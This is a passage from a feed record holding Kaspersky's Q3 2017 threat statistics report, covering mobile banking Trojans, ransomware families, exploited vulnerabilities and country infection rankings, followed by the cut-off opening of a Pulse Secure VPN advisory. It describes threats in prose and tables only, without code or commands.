[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)

Number of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017

#### New capabilities of mobile banking Trojans

Q3 2017 saw two significant events in the world of mobile banking Trojans.

Firstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.

Interestingly, in August we discovered yet another modification of Svpeng that uses special features.
Only this time the Trojan was not banking related – instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)

Trojan-Banker.AndroidOS.Svpeng.ag window containing ransom demand

Secondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.

#### The growth of WAP billing subscriptions

In the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.

Our Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions.
They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.

### Mobile threat statistics

In the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)

Number of detected malicious installation packages (Q4 2016 – Q3 2017)

#### Distribution of mobile malware by type

[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)

Distribution of new mobile malware by type (Q2 and Q3 2017)

RiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.

Trojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.

The share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% – almost 4 p.p.
less than in Q2.

In Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.

#### TOP 20 mobile malware programs

_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._

| | Verdict | % of attacked users* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 67.14 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 7.52 |
| 3 | Trojan.AndroidOS.Hiddad.ax | 4.56 |
| 4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96 |
| 5 | Trojan.AndroidOS.Loapi.b | 2.91 |
| 6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59 |
| 7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20 |
| 8 | Backdoor.AndroidOS.Ztorg.c | 2.09 |
| 9 | Trojan.AndroidOS.Agent.gp | 2.05 |
| 10 | Trojan.AndroidOS.Sivu.c | 1.98 |
| 11 | Trojan.AndroidOS.Hiddapp.u | 1.87 |
| 12 | Backdoor.AndroidOS.Ztorg.a | 1.68 |
| 13 | Trojan.AndroidOS.Agent.ou | 1.63 |
| 14 | Trojan.AndroidOS.Triada.dl | 1.57 |
| 15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57 |
| 16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53 |
| 17 | Trojan.AndroidOS.Hiddad.an | 1.48 |
| 18 | Trojan.AndroidOS.Hiddad.ci | 1.47 |
| 19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41 |
| 20 | Trojan.AndroidOS.Agent.eb | 1.29 |

_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._

First place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.

As in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.

Trojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C.
The Trojan requests administrator rights to prevent its removal.

Trojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan – a representative of the Loapi family. One of them – Trojan.AndroidOS.Loapi.b – came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.

Trojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>) and [Svpeng](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>) mobile banking families.

In seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.

Trojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them.
It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).

Trojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.

Occupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.

Trojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.

#### The geography of mobile threats

[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)

The geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Iran | 35.12 |
| 2 | Bangladesh | 28.30 |
| 3 | China | 27.38 |
| 4 | Côte d'Ivoire | 26.22 |
| 5 | Algeria | 24.78 |
| 6 | Nigeria | 23.76 |
| 7 | Indonesia | 22.29 |
| 8 | India | 21.91 |
| 9 | Nepal | 20.78 |
| 10 | Kenya | 20.43 |

_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._

For the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware – 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.

Russia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.

The safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).

#### Mobile banking Trojans

Over the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 – Q3 2017)

Trojan-Banker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts.
In addition, they steal money via SMS services, including mobile banking.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)

Geography of mobile banking threats in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Russia | 1.20 |
| 2 | Uzbekistan | 0.40 |
| 3 | Kazakhstan | 0.36 |
| 4 | Tajikistan | 0.35 |
| 5 | Turkey | 0.34 |
| 6 | Moldova | 0.31 |
| 7 | Ukraine | 0.29 |
| 8 | Kyrgyzstan | 0.27 |
| 9 | Belarus | 0.26 |
| 10 | Latvia | 0.23 |

_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._

In Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.

Of particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter.
This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.

#### Mobile ransomware

In Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as much as in the previous quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 – Q3 2017)

In our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.

Trojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)

Geography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**

| | Country* | % of attacked users** |
|---|---|---|
| 1 | US | 1.03% |
| 2 | Mexico | 0.91% |
| 3 | Belgium | 0.85% |
| 4 | Kazakhstan | 0.79% |
| 5 | Romania | 0.70% |
| 6 | Italy | 0.50% |
| 7 | China | 0.49% |
| 8 | Poland | 0.49% |
| 9 | Austria | 0.45% |
| 10 | Spain | 0.33% |

_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._

The US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.

In Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.

## Vulnerable apps exploited by cybercriminals

Q3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message – in case the embedded exploit fails.

Although two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% of users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.

There were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update.
However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)

Distribution of exploits used in attacks by type of application attacked, Q3 2017

The distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2). The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.

## Online threats (Web-based attacks)

_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._

### Online threats in the banking sector

_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._

In Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)

Number of users attacked by financial malware, Q3 2017

#### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)

Geography of banking malware attacks in Q3 2017 (percentage of all users attacked)

**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**

| | Country* | % of users attacked** |
|---|---|---|
| **1** | Togo | 2.30 |
| **2** | China | 1.91 |
| **3** | Taiwan | 1.65 |
| **4** | Indonesia | 1.58 |
| **5** | South Korea | 1.56 |
| **6** | Germany | 1.53 |
| **7** | United Arab Emirates | 1.52 |
| **8** | Lebanon | 1.48 |
| **9** | Libya | 1.43 |
| **10** | Jordan | 1.33 |

_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._

#### TOP 10 banking malware families

The table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):

| | Name* | % of attacked users** |
|---|---|---|
| **1** | Trojan-Spy.Win32.Zbot | 27.9 |
| **2** | Trojan.Win32.Nymaim | 20.4 |
| **3** | Trojan.Win32.Neurevt | 10.0 |
| **4** | Trickster | 9.5 |
| **5** | SpyEye | 7.5 |
| **6** | Caphaw | 6.3 |
| **7** | Trojan-Banker.Win32.Gozi | 2.0 |
| **8** | Shiz | 1.8 |
| **9** | ZAccess | 1.6 |
| **10** | NeutrinoPOS | 1.6 |

_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._

The malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%), whose share grew by nearly 4 p.p.

### Cryptoware programs

#### Q3 highlights

##### Crysis rises from the dead

In our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files.
This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.

However, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing – the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.

The above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.

##### Surge in Cryrar attacks

The Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim's files in password-encrypted RAR-sfx archives.

In the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar – a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim's system using the remote access protocol and manually launch the Trojan's installation file.
The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.

According to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.

##### Master key to original versions of Petya/Mischa/GoldenEye published

In July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.

This happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>) which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.

Unfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt MFT.

#### The number of new modifications

In Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)

Number of newly created cryptor modifications, Q3 2016 – Q3 2017

The number of new cryptor modifications continues to decline compared to previous quarters.
This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.

#### The number of users attacked by ransomware

July was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)

Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)

#### The geography of attacks

[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)

#### Top 10 countries attacked by cryptors

| | **Country\*** | **% of users attacked by cryptors\*\*** |
|---|---|---|
| 1 | Myanmar | 0.95% |
| 2 | Vietnam | 0.92% |
| 3 | Indonesia | 0.69% |
| 4 | Germany | 0.62% |
| 5 | China | 0.58% |
| 6 | Russia | 0.51% |
| 7 | Philippines | 0.50% |
| 8 | Venezuela | 0.50% |
| 9 | Cambodia | 0.50% |
| 10 | Austria | 0.49% |

_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._

Most of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.

Brazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10.
Europe is represented by Germany (0.62%) and Austria (0.49%).

Russia, in tenth the previous quarter, ended Q3 in sixth place.

#### Top 10 most widespread cryptor families

| | **Name** | **Verdict\*** | **% of attacked users\*\*** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% |
| 2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% |
| 3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% |
| 4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% |
| 5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% |
| 6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% |
| 7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% |
| 8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% |
| 10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% |

_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._

WannaCry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that WannaCry exploits.

Crypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.

The cryptor Purgen (6.90%) rounds off the top three after rising from ninth.
The rest of the rating is populated by 'old timers' – the Trojans Locky, Cerber, Cryrar, Shade, and Spora.

The Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.

### Top 10 countries where online resources are seeded with malware

_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)

Distribution of web attack sources by country, Q3 2017

In Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).

**Countries where users faced the greatest risk of online infection**

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | **Country**\* | **% of users attacked**\*\* |
|---|---|---|
| 1 | Belarus | 27.35 |
| 2 | Algeria | 24.23 |
| 3 | Russia | 23.91 |
| 4 | Armenia | 23.74 |
| 5 | Moldova | 23.61 |
| 6 | Greece | 21.48 |
| 7 | Azerbaijan | 21.14 |
| 8 | Kyrgyzstan | 20.83 |
| 9 | Uzbekistan | 20.24 |
| 10 | Albania | 20.10 |
| 11 | Ukraine | 19.82 |
| 12 | Kazakhstan | 19.55 |
| 13 | France | 18.94 |
| 14 | Venezuela | 18.68 |
| 15 | Brazil | 18.01 |
| 16 | Portugal | 17.93 |
| 17 | Vietnam | 17.81 |
| 18 | Tajikistan | 17.63 |
| 19 | Georgia | 17.50 |
| 20 | India | 17.43 |

_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._  
_\* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users)._  
_\*\* Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._

On average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)

Geography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).

## Local threats

_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._

_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._

In Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.

**Countries where users faced the highest risk of local infection**

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes **Malware-class** attacks.
The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | **Country**\* | **% of users attacked**\*\* |
|---|---|---|
| 1 | Yemen | 56.89 |
| 2 | Vietnam | 54.32 |
| 3 | Afghanistan | 53.25 |
| 4 | Uzbekistan | 53.02 |
| 5 | Laos | 52.72 |
| 6 | Tajikistan | 49.72 |
| 7 | Ethiopia | 48.90 |
| 8 | Syria | 47.71 |
| 9 | Myanmar | 46.82 |
| 10 | Cambodia | 46.69 |
| 11 | Iraq | 45.79 |
| 12 | Turkmenistan | 45.47 |
| 13 | Libya | 45.00 |
| 14 | Bangladesh | 44.54 |
| 15 | China | 44.40 |
| 16 | Sudan | 44.27 |
| 17 | Mongolia | 44.18 |
| 18 | Mozambique | 43.84 |
| 19 | Rwanda | 43.22 |
| 20 | Belarus | 42.53 |

_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._  
_\* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users)._  
_\*\* The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._

This Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.

On average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)

Geography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)

**The safest countries in terms of local infection risks** included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).

_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._
", "cvss3": {}, "published": "2017-11-10T10:45:04", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "modified": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2023-09-23T07:50:23", "description": "
### Summary

Unpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack.
[[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)

